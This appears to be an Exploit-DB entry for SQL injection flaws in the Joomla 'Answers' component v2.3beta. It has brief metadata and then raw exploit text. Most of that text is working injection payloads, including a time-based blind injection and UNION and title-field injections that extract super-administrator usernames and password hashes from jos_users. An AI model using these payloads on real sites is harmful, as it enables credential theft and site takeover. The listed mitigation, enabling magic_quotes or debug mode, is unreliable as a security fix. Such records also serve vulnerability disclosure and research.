Joomla Component Answers v2.3beta Multiple Vulnerabilities

vendor:

Component Answers

by:

jdc

5.5

CVSS

MEDIUM

Blind SQL Injection, Title Field SQL Injection, SQL Injection

CWE

Product Name: Component Answers

Affected Version From: 2.3beta

Affected Version To: 2.3beta

Patch Exists: NO

Related CWE: -

CPE: -

Metasploit:

Other Scripts:

Platforms Tested: PHP5, MySQL5

2010

Joomla Component Answers v2.3beta Multiple Vulnerabilities

Blind SQL Injection: Requires magic_quotes OFF. Exploit: option=com_answers & task=categ & id=-1' union select benchmark(100000,md5(5)) as a -- 'Title Field SQL Injection: Exploit: title',(select concat(username,char(32),password) from jos_users where gid=25 limit 1),'0','1','0','','') -- ;SQL Injection: Requires magic_quotes OFF, Joomla! debug OFF. Exploit: option=com_answers & task=detail & id=-1' union select concat(username,char(32),password),2,3,4,5,6,7,8,9 from jos_users where gid=25 limit 1 -- '

Mitigation:

Enable magic_quotes or Joomla! debug mode

Source

Exploit-DB raw data:

# Exploit Title: Joomla Component Answers v2.3beta Multiple Vulnerabilities
# Date: 25 May 2010
# Author: jdc
# Software Link: 
http://extensions.joomla.org/extensions/communication/forum/12652
# Version: 2.3beta
# Tested on: PHP5, MySQL5

Blind SQL Injection
===================
Requires: magic_quotes OFF

?option=com_answers
&task=categ
&id=-1' union select benchmark(100000,md5(5)) as a -- '


Title Field SQL Injection
=========================
title',(select concat(username,char(32),password) from jos_users where 
gid=25 limit 1),'0','1','0','','') -- ;


SQL Injection
=============
Requires: magic_quotes OFF, Joomla! debug OFF

?option=com_answers
&task=detail
&id=-1' union select concat(username,char(32),password),2,3,4,5,6,7,8,9 
from jos_users where gid=25 limit 1 -- '